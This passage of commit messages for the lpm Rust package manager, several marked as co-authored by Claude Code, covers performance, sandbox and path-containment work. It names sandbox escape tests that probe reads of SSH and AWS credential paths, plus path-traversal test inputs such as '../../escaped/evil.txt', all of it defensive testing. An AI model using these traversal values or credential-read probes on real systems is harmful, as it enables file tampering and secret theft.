warming):

- **Pre-fix:** +32 % median wall-clock regression (+770 ms).
- **Post-fix:** +6–8 % median wall-clock (+170–200 ms), within the
  ±10 % noise floor the 2026-04-10 baseline doc calls out for this
  class of measurement.

Net: ~570 ms saved on a 277-pkg fixture. The residual ~200 ms
lives in the post-stage `capture_blocked_set_after_install_with_metadata`
pass (per-package `compute_script_hash` + `read_install_phase_bodies`
on the store tree + trust-snapshot write) — legitimate Phase 46
security work that wasn't present in main; leaving that for a
follow-up perf pass if it ever surfaces as a user complaint.

Shape of the fix: collect the per-package async block into a
`Vec<impl Future<Output = Option<(...)>>>` and run them through
`futures::future::join_all(...).await`, then fold into `out`
sequentially. Order is preserved (join_all is positional), so
behaviour is byte-identical to the serial version — this is a
pure concurrency win, no logic or output change. `out` is keyed
by `(name, version)` so the final map is the same.

Scope: touches `build_blocked_set_metadata` only (call site of the
serial loop). Related per-package patterns elsewhere in install.rs
that still use serial awaits:

- L1674 — minimum-release-age gate (`block_in_place + block_on`
  per package). Only fires on `!allow_new && !used_lockfile`, so
  users either hit the cooldown warning once and re-run with
  `--allow-new`, or bypass it entirely via project config.
  Not the common path.
- L1803 — provenance-drift gate. Gated on
  `has_rich_approvals = false`, which short-circuits for every
  project that hasn't yet written any rich-form
  `trustedDependencies` entries (i.e. everyone today).

Both would benefit from the same fanout treatment but neither
triggers for the common `lpm install` invocation the bench
measures, so leaving them for a follow-up rather than growing the
46.0 close-out.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Captures the 2026-04-23 tag-cut bench data alongside the existing
2026-04-10 Phase 32 baseline:

- §12.7 cold-install-triage axes 1/2 (2026-04-22 23:45 reading):
  triage vs deny both inside ≤5% target per §12.7 v2.11.
- §13.1 A/B cross-binary (main vs phase-46 under --policy=deny):
  10-iter order-alternated median = **+7.8%**, within the 10%
  noise floor called out in the 2026-04-10 baseline.
- Per-stage JSON breakdown — localizes the residual delta to the
  post-stage capture_blocked_set_after_install_with_metadata pass
  (legitimate Phase 46 security work, not present in main).

Also documents the two other per-package serial-await hotspots
(L1674 minimum-release-age, L1803 provenance-drift) as backlog
items — neither triggers on the common `lpm install --allow-new`
invocation benchmarked here.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Phase 46.0 — tiered script-policy gate (runner vision).

## Highlights

Phase 46.0 ships the four-layer tiered gate defined in
`DOCS/new-features/37-rust-client-RUNNER-VISION-phase46.md`:

- **P1** — schema extensions (`script-policy`,
  `trustedDependencies` rich form with integrity + script_hash +
  provenance binding), `ScriptPolicyConfig` loader,
  `--policy=deny|allow|triage` flag, `--yolo` / `--triage`
  shorthands, trust-snapshot persistence + diff.
- **P2** — static-gate classifier. Regex-based tokenization with
  green allowlist, red denylist, amber compound-script fallback.
  ≥500-entry fixture corpus locked; ≥60% green rate on
  non-adversarial entries; zero false-positive reds.
- **P3** — cooldown (`--min-release-age` + global config key,
  `minimumReleaseAge` in `package.json`). Wraps the existing
  `--allow-new` override with a narrower numeric override path.
- **P4** — provenance-drift gate. Fetches Sigstore attestation
  identities from registry.npmjs.org, compares against approved
  snapshot, blocks on "provenance dropped" or "identity changed"
  (publisher rotation). `--ignore-provenance-drift[-all]`
  overrides for per-package / per-install waivers.
- **P5** — filesystem-scoped sandbox (macOS Seatbelt backend).
  Approved-script execution inside per-run fileset scope; §12.5
  escape test blocked; green-corpora compat green.
- **P6** — tier-aware auto-build (hard-gated on P5). `build::run`
  auto-approves greens under `triage`; `all_scripted_packages_trusted`
  is tier-aware; non-TTY autoBuild + triage snapshot test green.
- **P7** — version-diff UI. Behavioral-tag delta render,
  script-hash drift card on `approve-builds --list`, JSON
  enrichment (SCHEMA_VERSION 2→3 + per-entry `version_diff`).
- **P9** — close-out. `cold-install-triage` bench green
  (Axis 1 −15%, Axis 2 +3% vs deny, both ≤5% target). Next.js
  16.2.4 red-count = 0 validation on 2026-04-22. Cross-binary
  A/B on 277-pkg fixture: +7.8% median wall-clock (within the
  ±10% noise floor).

P8 (LLM triage harness) is **deferred to Phase 46.1**. Hard
precondition P5 + P6 are shipped; the LLM detection + constrained
verdict schema lands in the follow-up phase.

## Release tag-cut fixes (this session)

- `ed001fa` — bench harness honors `BENCH_WORK_DIR` +
  `BENCH_PROJECT_DIR` env overrides so running `cold-install-clean`
  doesn't trigger VS Code's `--no-ignore` rg search storm on the
  workspace `bench/.work` tree.
- `f19d23e` — `install.rs > build_blocked_set_metadata` fanned
  out through `futures::future::join_all`. Serial per-package
  `.await`s on metadata + provenance lookups were adding ~770ms
  to deny-mode wall-clock on a 277-package tree; fanout drops
  that to ~200ms (noise floor). Tree output is byte-identical to
  the serial version.
- `4607f4f` — `bench/baselines/2026-04-23-46.0-macos-arm64.md`
  records the tag-cut readings and documents two other
  per-package serial-await hotspots (L1674 minimum-release-age,
  L1803 provenance-drift) as backlog items.

## Release artifacts

- Workspace `Cargo.toml` (0.22.0 → 0.23.0) + 5
  `npm/cli-*/package.json` (same bump).
- `Cargo.lock` auto-synced via `cargo check --workspace`
  (gitignored; CI re-syncs on its own).
- Local CI gate green:
  - `cargo clippy --workspace --all-targets -- -D warnings`
  - `cargo fmt --check`
  - fancy-regex guard
  - `cargo build --workspace`
  - `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 4217/4217
  - `cargo test -p lpm-auth` × 3 under default parallelism — 47/47 each, deterministic

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The test module in `lpm-cert/src/trust.rs` contains a single test
that is `#[cfg(target_os = "macos")]`. On Linux CI, the test itself
is filtered out at compile time, leaving the enclosing `mod tests`
with an empty body and a now-unused `use super::*`, which fails
`cargo clippy -- -D warnings` per the `unused-imports` rule.

Local `cargo clippy --workspace --all-targets -- -D warnings` on
macOS didn't catch this because the macOS test IS compiled and
DOES use the `login_keychain_path` symbol via `super::*`. Only
the Linux runner surfaces the drift.

Per the Rust CLI cross-platform hygiene rules in
`a-package-manager/CLAUDE.md > Rust CLI Code Rules`:

> Move platform imports into the function body — If a `use`
> import is only needed inside a `#[cfg]` block, put the `use`
> inside that block, not at the top of the file.

Simpler here: qualify `super::login_keychain_path` at the one
call site and drop the `use` entirely. The module has no other
imports.

No functional change. Pre-existing hygiene bug surfaced by the
phase-46 PR run on #7 (tagging v0.23.0 fired
the Release workflow from the tag and succeeded; the PR CI event
is what runs the Linux lint job).

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…y-test fix)

The §12.5 escape-corpus read tests and the two in-module write/read
deny tests in `linux.rs` placed their "forbidden" probe files
under `tempfile::tempdir()`. On macOS this resolved to
`/var/folders/.../T/.tmpXXX/` — outside every sandbox rule, so
Landlock/Seatbelt correctly denied access and the tests asserted
that denial.

On Linux, `tempfile::tempdir()` defaults to `/tmp/.tmpXXX/`, and
`/tmp` is in the Landlock RW allow list by design (see
compat_greens `tmp_scratch_write_shape_succeeds` — many real-world
postinstalls hardcode `/tmp/...` paths for intermediate artifacts
and the sandbox must not break them). Every probe landed INSIDE
the allow list, Landlock correctly permitted it, and the tests
then asserted denial → FAIL.

Five failing tests on #7's Linux CI, all of
this shape:

- lpm-sandbox::linux::tests::denies_write_outside_allow_list_under_enforce
- lpm-sandbox::linux::tests::enforces_deny_on_read_outside_allow_list
- lpm-sandbox::escape_corpus::block_read_of_file_outside_allow_list
- lpm-sandbox::escape_corpus::block_read_of_ssh_credential_shape_path
- lpm-sandbox::escape_corpus::block_read_of_aws_credentials_shape_path

Root cause: the *tests* picked a probe location that on Linux
happens to overlap the sandbox's designed-in /tmp RW permission.
The sandbox rule is correct (backed by the green-corpus
`/tmp`-write test); the test setup was testing the wrong thing.

Fix: relocate every forbidden probe onto `/var/tmp/<unique>` — a
standard POSIX scratch dir that's user-writable on both macOS and
Linux and is NOT referenced by any rule in describe_rules or the
Seatbelt profile. Probes clean up after themselves
(`remove_dir_all` at test end); the `!target.exists()` assertion
still catches genuine sandbox escapes.

Also uncovered and preserved: the in-module unit test
`tmpdir_distinct_from_slash_tmp_gets_its_own_rule` was
accidentally deleted in an earlier attempt at this fix — restored
with the original semantics (additive `(spec.tmpdir, RW)` +
blanket `/tmp` rule, both present). The additive behavior is
intentional per Phase 46's §9.3 design and required by the
compat-greens `/tmp` test.

Ran locally on macOS arm64:
- `cargo clippy --workspace --all-targets -- -D warnings` — clean
- `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 4217/4217 pass, 7 skipped (mode-specific)
- `cargo test -p lpm-sandbox` — 72 lib + 7 escape + 7 compat_greens
  = 86 tests, all green

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two small CI fixes landing atop the 2026-04-23 sandbox probe-path
correction (commit 10e75ac):

**1. `lpm-task::filter::eval::tests::perf_eval_glob_200_members_under_500us_per_call`**

Per-op budget test flaked on GitHub Actions Linux runner. Root
cause: the `time_per_op` helper returned `total_elapsed_ns /
iters` after a SINGLE round of `iters` iterations. A single
500 ms scheduler stall during the 500-iter loop amortized into
+1 ms per-op — 2× the 500 µs debug budget.

This wasn't a code regression; it was an unreliable measurement
on shared hardware. Changed `time_per_op` to best-of-5 rounds:
each round runs `iters_per_round` iterations independently, the
minimum round's ns/op is returned. Rationale: a ns/op budget
is asking "can this code hit this latency when the scheduler
cooperates?" — a genuine regression in LPM's own code shifts
ALL rounds (so the minimum moves too), whereas a single stall
only hurts one round (min unaffected). Best-of-N gives us a
regression detector that survives CI without masking actual slowdowns.

All four perf tests (parse, exact-name, glob, closure-with-deps)
now share the best-of-5 helper. Error messages updated to say
"best-of-5" so the signal is discoverable.

**2. Rustfmt 1.94.0 reflow**

`cargo fmt` on pinned 1.94.0 (the CI toolchain) preferred
`.join(format!(...))` chains wrapped differently from the local
`rustfmt` default — harmless whitespace-only diff on
`lpm-sandbox/src/linux.rs` and `lpm-sandbox/tests/escape_corpus.rs`.
Reformatted to match CI.

Ran locally:
- `rustup run 1.94.0 cargo fmt --check` — clean
- `cargo clippy --workspace --all-targets -- -D warnings` — clean
- `cargo test -p lpm-task filter::eval::tests` — 54 pass

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@tolgaergin tolgaergin merged commit a9aa1a1 into main Apr 23, 2026
3 checks passed
tolgaergin added a commit that referenced this pull request Apr 29, 2026
* phase-60 D2: promote download_tarball_routed helpers to RegistryClient

Behavior-preserving refactor extracting the two private routed-tarball
helpers from install.rs (download_tarball_routed,
download_tarball_streaming_routed) onto RegistryClient as public
methods. Both `lpm install` and the upcoming Phase 60 `lpm add` source-
delivery flow consume the same Custom-route auth-attachment logic.

- crates/lpm-registry/src/client.rs: add public methods
- crates/lpm-cli/src/commands/install.rs: switch all 5 call sites to
  the new methods; delete the private helpers; remove the now-unused
  DownloadedTarball import

All 602 install + npmrc tests still pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.0.e: PackageMetadata::resolve_version_spec helper

Add a three-tier version-spec resolver on PackageMetadata covering
dist-tag → exact-version → semver-range, mirroring the canonical
pattern at install_global.rs:368-405 verbatim.

Pre-Phase-60, `lpm add react@beta`, `next@canary`, `lodash@^4` all
failed because PackageMetadata::version() is a pure HashMap lookup —
none of those literal strings exist as concrete versions. The new
helper closes the gap.

Per D3 (preplan): both parse-failure and no-satisfying-version
return LpmError::Script (matching install_global verbatim) so the
Phase 60.1 migration of the four duplicate sites (install_global,
install, update_global, global) is a true behavior-preserving
refactor.

9 unit tests cover dist-tag (latest/beta/canary), exact match,
caret/tilde range, no-satisfying error, parse-fail error, and
empty-versions error.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.0+60.1+60.1.5+60.2: lpm add source delivery from any registry

Decouple `lpm add` from LPM-only package identity, mirror install's
full .npmrc setup, switch to file-spool tarball download, add
destination-side path containment, gate dep auto-install on
lpm.config.json presence, and surface external imports for the simple
path. End-to-end flow now works for any package on any registry the
rust client can reach (lpm.dev worker, npmjs.org direct, .npmrc-
declared private registries).

60.0.a + 60.0.b — Identity refactor + drop dotted-name auto-prepend
- New AddTarget enum: Lpm(PackageName) | Npm { spec: String }.
- New resolve_add_target replaces parse_package_ref. No rewriting
  outside the @lpm.dev/ scope — `lodash.merge`, `tolga.foo`, etc.
  resolve to AddTarget::Npm verbatim. Fixes a long-standing
  correctness bug: pre-Phase-60 dotted bare names were silently
  rewritten to @lpm.dev/<name> which doesn't exist on lpm.dev.
- All output / log / JSON sites render via target.display() /
  target.json_name() — `name.scoped()` no longer used unconditionally.
- Skills branch type-encoded via `let AddTarget::Lpm(pkg) = &target`
  pattern, with a why-comment (60.2) explaining the scope gate
  (lpm.dev runs LLM scans on shipped skill content; arbitrary npm
  packages are not scanned).

60.0.c — Mirror install's full .npmrc setup
- Build RouteTable::from_env_and_filesystem before any network call.
- Surface npmrc_warnings (non-JSON) and the strict-ssl=false security
  warning (escapes --json). Clone the client with with_tls_overrides
  so cafile= / strict-ssl=false take effect on metadata + tarball
  fetches. Mirrors install.rs:3295-3445.

60.0.d — Routed metadata + file-spool tarball
- Metadata: AddTarget::Lpm uses get_package_metadata; AddTarget::Npm
  uses get_npm_metadata_routed.
- Tarball: client.download_tarball_routed (D2 promoted helper) +
  lpm_extractor::extract_tarball_from_file. Bounded memory via
  MAX_COMPRESSED_TARBALL_SIZE (500 MB) for free; lpm add typescript
  (~22 MB) and worst-case @scope/giant-fixture no longer load the
  whole tarball into RAM.

60.0.f — Destination-side path containment (D6)
- New resolve_safe_dest helper canonicalizes target_dir once and
  validates every write destination: refuses to follow existing
  symlinks, rejects writes whose canonical parent escapes the target
  root. Wired into the Step 8 file-copy loop. Closes the threat-model
  gap that opened up when add expanded from "trusted lpm.dev
  publishers" to "any npm publisher."

60.1 — Dep gate + bare-imports notice (D4)
- Tighten dep gate: `if !no_install_deps && lpm_config.is_some()`.
  Simple path is download-manager: copy bytes, no auto-install.
- import_rewriter exports a sibling collect_bare_specifiers fn that
  shares an internal SpecifierKind classifier with rewrite_imports
  (anti-drift contract — "bare" means the same thing in both places).
- add.rs surfaces the collected externals as a non-JSON notice and
  as a `external_imports` array in the JSON output.

60.1.5 — Non-interactive simple-path guard
- `lpm_config.is_none() && target_path.is_none() && (yes || json ||
  !is_tty)` errors before the file-copy loop. Heuristically defaulting
  components/ for arbitrary 3rd-party source under --yes/--json/non-TTY
  is a CI/automation footgun.

Tests
- 15 unit tests in add.rs (resolve_add_target classification including
  the dotted-name regression; resolve_safe_dest contracts including
  symlink-refusal on Unix).
- 10 unit tests in import_rewriter.rs (classify_specifier,
  collect_bare_specifiers).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.3: integration tests for lpm add simple path + guards + traversal

Three new wiremock-driven integration tests covering the highest-value
end-to-end scenarios for Phase 60:

- add_simple_non_interactive_without_path.rs (4 sub-tests) — proves
  the 60.1.5 guard fires for --yes, --json, and non-TTY (stdin from
  /dev/null) without --path; positive control with --path succeeds.
  No package.json mutation in any failure case.

- add_source_npm_simple.rs (2 sub-tests) — full simple-path pipeline
  via wiremock npm metadata + tarball: AddTarget::Npm resolves, file-
  spool download, extract, files copied flat (no auto-nest), bare-
  imports notice lists react + @radix-ui/react-slot, package.json
  NOT mutated, .lpm/skills/ NOT created. JSON sub-test asserts the
  package.name uses the npm-style identity (not @lpm.dev/-prefixed)
  and the new external_imports array is well-shaped.

- add_path_traversal_dest_escape.rs — proves resolve_safe_dest is
  wired into the actual write loop, not just unit-tested in
  isolation. Tarball ships an lpm.config.json with files[0].dest =
  "../../escaped/evil.txt" — assertion: containment-violation error,
  exit non-zero, no file written outside target_dir.

Other 60.3 specced tests are either (i) covered by the unit tests
that landed alongside the implementation (#5 dotted-name, #9 version-
spec, #11 symlink — see preplan v6 audit checklist) or (ii)
deliberately deferred where the underlying machinery is already
test-covered by Phase 58.x install tests (#1 lpm.dev rich, #2 npm
rich, #6 npmrc auth, #7 strict-ssl, #8 missing-var fatal).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.4: README — lpm add now works against any registry

- Update the lpm add one-liner in the Commands list.
- Add a "How lpm add Works" section explaining: source delivery vs.
  install, the firm naming rule (@lpm.dev/owner.name only), the rich
  vs. simple paths, and the non-interactive --path requirement.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 audit fix: resolve_safe_dest must validate before mkdir

Audit reproduced (with a temp-dir filesystem probe) that the landed
resolve_safe_dest helper still created directories OUTSIDE the
target_dir for two attack vectors before the containment error fired:

1. `dest_rel = "../../escaped/evil.txt"` — `Path::join` resolves
   lexically; `dest.parent()` lands outside target; `create_dir_all`
   ran before the containment check, leaving `<target>/../escaped/`
   on disk even though the file write was correctly blocked.

2. Absolute `dest_rel = "/tmp/elsewhere/evil.txt"` — `Path::join` of
   an absolute path returns the absolute path verbatim; `parent =
   /tmp/elsewhere/`; `create_dir_all` created it before the
   containment check fired.

The original integration test only asserted no escaped FILE existed,
so the directory-side-effect bug passed CI.

Fix
- Reorder resolve_safe_dest so EVERY check that can reject the
  destination runs BEFORE any filesystem mutation:
  Step 1 (NEW) — reject absolute dest_rel up-front.
  Step 2 (NEW) — reject any ParentDir / RootDir / Prefix component.
  Step 3 — refuse existing-symlink destinations.
  Step 4 (NEW) — pre-mkdir ancestor canonicalization: walk up to the
    longest existing ancestor; canonicalize; require it under
    target_root_canonical (catches symlinked intermediate dirs).
  Step 5 — create_dir_all (NOW safe).
  Step 6 — post-mkdir re-canonicalize as TOCTOU defense-in-depth.

  The lexical bans in Steps 1-2 kill the entire `../escape` and
  absolute-path attack classes before any mkdir runs. The longest-
  existing-ancestor walk in Step 4 covers the symlinked-intermediate
  case (target/foo → /tmp/elsewhere). Step 6 is paranoia.

Tests
- Strengthen unit tests:
  - resolve_safe_dest_dotdot_in_path_rejected_with_no_external_dir_created
    now asserts no escape directory was created.
  - resolve_safe_dest_absolute_dest_rejected_with_no_external_dir_created
    is new — covers the absolute-path attack.
  - resolve_safe_dest_dotdot_in_middle_of_path_also_rejected covers
    `foo/../bar.txt` (lexically resolves back inside but still
    rejected up-front).
- Extend integration test:
  - dest_escape_via_dotdot_is_refused_and_creates_no_external_directory
    now snapshots target_dir entries before the run and asserts no
    unexpected new top-level entries appeared, plus no escape dir.
  - dest_escape_via_absolute_path_is_refused_and_creates_no_external_directory
    is new — covers the absolute-path attack at the integration level.

Net: 4923 → 4926 workspace tests; clippy + fmt clean; all green.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request Apr 30, 2026
…rs/ (Phase 61.1)

The big lever — the isolated linker's per-package wrapper tree moves
out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the
relayout, `rm -rf node_modules` no longer wipes the entire incremental
linker cache, so the warm-install bench (and the user pattern Phase 57.2
surfaced — wiping node_modules after a teammate's lockfile change)
actually exercises the incremental linker.

Symlink-target shape changes (audit fix #1, v3):
- Phase 3 root symlinks (canonical + aliases) gain one extra `..`
  segment and route through `<project>/.lpm/wrappers/<seg>/...`.
  Centralized in `LayoutPaths::root_symlink_target()` so the depth
  math (link-depth + 1) is computed in one place.
- Phase 3.5 self-references unchanged — they target the project root,
  which doesn't move under Tier 2.
- Phase 2 internal sibling-wrapper symlinks unchanged — both endpoints
  live inside `.lpm/wrappers/` so the relative `../../` shape is
  preserved.

Drive-by audit fixes folded in:
- #3 (bin-shim wrapper segment): `create_bin_links` now uses
  `pkg.wrapper_segment()` instead of hardcoding
  `format!("{safe}@{version}")`. Pre-fix, local-source deps with a
  `bin` field produced shims pointing at non-existent wrapper paths.
- #7 (Windows junction `..` normalization): added a lexical-clean
  helper inside `create_symlink_or_junction`'s Windows arm so the
  `../.lpm/wrappers/...` shape doesn't embed an unresolved `..`
  segment in the path handed to `cmd /c mklink /J`.

`cleanup_stale_entries` updates:
- Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root
  `create_dir_all` covered both via parent recursion; now they're
  disjoint paths).
- Skips dotfile entries (e.g., the new `.version` schema-tag) when
  sweeping stale wrappers.
- Writes `<wrapper-root>/.version` (D6) for forward-compat shape
  detection.

Test fixtures migrated to use `LayoutPaths` so they track production
semantics on any future shape change. 4949 workspace tests pass;
clippy --workspace -D warnings clean; cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request Apr 30, 2026
* feat(lpm-runtime): RuntimeStatus carries resolved managed-runtime bin

`Ready` and `Installed` now carry a `bin_dir: PathBuf` field — the
managed-runtime bin path that `node_bin_dir(&version)` already resolves
inside `ensure_runtime` and would otherwise discard. Downstream callers
(the PATH builder in `lpm-runner/bin_path`) can consume this hint to
skip a redundant `detect_node_version` + `list_installed` pass per
`lpm run` invocation.

For the `Installed` branch, defensively re-stat after install — if the
freshly-installed bin dir vanished mid-call (race / external tampering),
degrade to `NotInstalled` rather than panic.

This is the data-shape change that the rest of Phase 61 Tier 1 builds on.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-runner): 3-state ManagedRuntimeHint + pre-resolved PATH builder

Adds `ManagedRuntimeHint { Bin(PathBuf) | Absent | Unknown }` plus
`build_path_with_bins_pre_resolved(start_dir, hint)`. The existing
public `build_path_with_bins` becomes a thin wrapper that passes
`Unknown` — preserving the silent-detect contract for callers that
don't go through `ensure_runtime` first (rebuild, dlx, hooks,
tools.rs, doctor, orchestrator).

Why three states, not `Option<PathBuf>`:
- `Bin(path)`  — caller resolved the managed runtime: use it directly.
- `Absent`     — caller called `ensure_runtime` and confirmed there
                 is no managed runtime to use. PATH builder skips the
                 silent re-detect entirely (the win on unpinned projects).
- `Unknown`    — caller hasn't checked. Falls back to silent detect
                 (current pre-Phase-61 behavior).

Collapsing `Absent` and `Unknown` into one nullable would force the
silent re-detect on the unpinned-project path — the most common shape.

Two deterministic unit tests cover the contract: `_uses_hinted_bin`
asserts the produced PATH is exactly [nm_bin, hint_bin, ...inherited]
when `Bin(...)` is supplied (uses a non-existent fake path so any
re-stat would fail-loud); `_absent_skips_runtime` asserts the PATH is
exactly [nm_bin, ...inherited]. Both assert full structure rather than
substring presence/absence so they're robust to whatever managed-
runtime fragments the developer's PATH happens to contain.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(lpm-runner/script): thread bin_hint through script/command entrypoints

Extends every `pub fn run_*` in the script runner with a
`bin_hint: &ManagedRuntimeHint` parameter, routing each internal
PATH-build through `build_path_with_bins_pre_resolved` instead of the
silent-detect wrapper. Eight entrypoints touched:

- run_script, run_script_with_envs, run_script_captured
- run_script_buffered, run_script_prefixed
- run_command, run_command_captured, run_command_buffered,
  run_command_prefixed

No backwards-compatibility shims — per CLAUDE.md "no `// removed`
comments, no shims, no parallel slow-path wrappers." Tests pass
`&ManagedRuntimeHint::Unknown` (imported as `Unknown` at the top of
the test mod for brevity).

Public API surface change is mechanical (one extra parameter); the
sole external consumer is `lpm-cli`, migrated in the next commit.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(lpm-cli): consume bin_hint, collapse cache-config reads, delete dead wrappers

Threads the `ManagedRuntimeHint` from `commands::run::ensure_runtime`
through the script-execution chain so the downstream PATH builder
doesn't redo `detect_node_version` + `list_installed` on every
`lpm run` invocation.

Signature changes:
- `commands::run::ensure_runtime` now returns `ManagedRuntimeHint`
  (`Bin(bin_dir)` for Ready/Installed; `Absent` for NotInstalled and
  NoRequirement).
- `run`, `run_multi`, `run_workspace`, `run_watch`, `exec`,
  `run_tasks_sequential`, `run_tasks_parallel`, `run_task`, and
  `run_task_captured` all gain a `bin_hint` parameter.

Caller migration:
- `main.rs:3102` (watch path) and `main.rs:3527` (External script
  shortcut) capture the hint before calling `run_watch` / `run`.
- `dev.rs` captures `runtime_hint` via the existing `tokio::join!`
  block instead of discarding it; threads to the dev script invocation.
- `migrate.rs::run_verification` resolves the hint once and reuses
  it across the build + test verification scripts.

Caller contract: every callsite of `run` / `run_multi` / `run_watch`
/ `exec` MUST invoke `ensure_runtime` first — that's where the
user-visible "Using node X" notice + auto-install fire. Documented
on `pub async fn run` so future callers don't bypass it accidentally.

Cache-context dedup (Tier 1.4.2):
- `run` reads `lpm.json` once at the top instead of twice (cache-hit
  check + caching-enabled check both used to read).
- Migrates the simple-script path to use the existing
  `try_cache_hit_with_config` and `is_task_cached_with_config`
  helpers — the no-config wrappers were only used by this one
  callsite.

Dead-code removal (CLAUDE.md "no shims"):
- Delete `is_task_cached`, `try_cache_hit`, `try_cache_store_with_output`
  — every other call site already used the `_with_config` variants.
- Delete the `is_task_cached_false_without_lpm_json` test that
  exclusively exercised the deleted wrapper; the equivalent contract
  is exercised by `is_task_cached_with_config_*` tests.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* perf(lpm-cli/run): Tier 1 follow-ups — workspace pin inheritance, parallel Arc reuse, is_meta_task plumbing

Three follow-ups that landed during the M/L review pass on top of the
base hint threading:

L1 — `is_meta_task` no longer reads `package.json` per call.

  Caller (`run_multi`, `run_workspace_package`) extracts `pkg.scripts`
  once and threads it down through `run_tasks_sequential` /
  `run_tasks_parallel` / `is_meta_task`. The dependsOn-but-no-command
  case previously paid one `package.json` read per task in the
  parallel loop; now zero. The `is_meta_task_from_config` alias
  collapses into the single `is_meta_task` since the helper is
  filesystem-free now.

L2 — `run_tasks_parallel` wraps shared per-call state in `Arc`.

  Pre-Tier-1: each spawned thread did a full `clone` of the hint,
  the tasks `HashMap`, the `LpmJsonConfig`, and (post-L1) the
  `pkg_scripts` `HashMap`. Post-Tier-1: each is `Arc::new`'d once
  before the loop, threads do a refcount bump. Negligible per-thread
  but avoids quadratic-feeling allocations on wide parallel levels.

L3 — workspace per-member calls inherit the root hint when the
member has no own pin.

  `run_workspace_package` probes the member dir via
  `lpm_runtime::detect::detect_node_version` (single-dir, no walk).
  If the member has its own .nvmrc / engines / lpm.json runtime,
  pass `Unknown` so the silent detect resolves the member-level
  pin. If not, inherit the root hint. Matches user intuition that
  the workspace-root pin governs the whole workspace (like nvm
  walking parent dirs).

  Small behavior change: a workspace member with NO own Node pin
  now uses the root-resolved managed runtime instead of falling back
  to system Node. Arguably a bug fix — pre-Tier-1 behavior was
  inconsistent (root auto-installed Node 22 but member silently
  ran on whatever `node` happened to be on PATH).

Plus the M/L review fixes batched in:
- M1: doc note on `pub async fn run` documenting the
  `ensure_runtime`-must-be-called-first contract.
- M2/M3: `bin_path` test assertions tightened to compare the full
  PATH segment list, not substring presence/absence (robust to
  whatever managed-runtime fragments the developer's PATH happens
  to contain).
- Style: `Default for ManagedRuntimeHint` returning `Unknown`; test
  mods import `ManagedRuntimeHint::Unknown` so call sites read
  `&Unknown` instead of `&ManagedRuntimeHint::Unknown`.

Measurement (n=101, time.perf_counter_ns(), M5 Mac, load avg ~3):
- Managed-runtime fixture (.nvmrc + 7 entries): ~150 µs / lpm run.
- No-managed-runtime fixture: ~60 µs / lpm run.
- bench/run.sh script-overhead (1ms resolution, n=21): within noise.

Sub-perceptible at ms resolution; preparatory plumbing for Tier 2
warm-path relayout. See preplan v3 status block for full numbers.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(lpm-linker): introduce LayoutPaths utility (Phase 61.0.5, no behavior change)

Centralizes wrapper / metadata / health-check path construction. Every
production callsite that built `node_modules/.lpm/...` paths inline now
goes through `LayoutPaths::for_project(project_dir).{isolated,hoisted}_*`.

61.0.5 contract: every helper returns the legacy path
(`node_modules/.lpm/`). No observable behavior change. 61.1 will flip
`isolated_*` to `<project>/.lpm/wrappers/...` as a single source-of-truth
edit; consumers migrate transparently.

Production migrations in this commit:
- `lpm-linker::cleanup_stale_entries`: wrapper-root construction
- `lpm-linker::link_one_package`: pkg-entry-dir + .linked marker
- `lpm-linker::link_finalize`: wrapper-root for bin link traversal
- `lpm-linker::link_packages_hoisted`: metadata path + nested-root (via
  `hoisted_*` helpers, intentionally still scoped to `node_modules/`)
- `lpm-cli::commands::rebuild::live_package_dir`: isolated probe

`doctor.rs` predicate is intentionally NOT migrated here — its semantic
change (handling hoisted-no-conflicts via `install_appears_healthy()`)
lands in 61.4.

Adds `crates/lpm-linker/src/layout.rs` with 13 unit tests covering all
helpers including the 5 `InstallHealth` variants and the
`needs_layout_migration` invariant in 61.0.5.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-linker): flip isolated wrapper root to <project>/.lpm/wrappers/ (Phase 61.1)

The big lever — the isolated linker's per-package wrapper tree moves
out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the
relayout, `rm -rf node_modules` no longer wipes the entire incremental
linker cache, so the warm-install bench (and the user pattern Phase 57.2
surfaced — wiping node_modules after a teammate's lockfile change)
actually exercises the incremental linker.

Symlink-target shape changes (audit fix #1, v3):
- Phase 3 root symlinks (canonical + aliases) gain one extra `..`
  segment and route through `<project>/.lpm/wrappers/<seg>/...`.
  Centralized in `LayoutPaths::root_symlink_target()` so the depth
  math (link-depth + 1) is computed in one place.
- Phase 3.5 self-references unchanged — they target the project root,
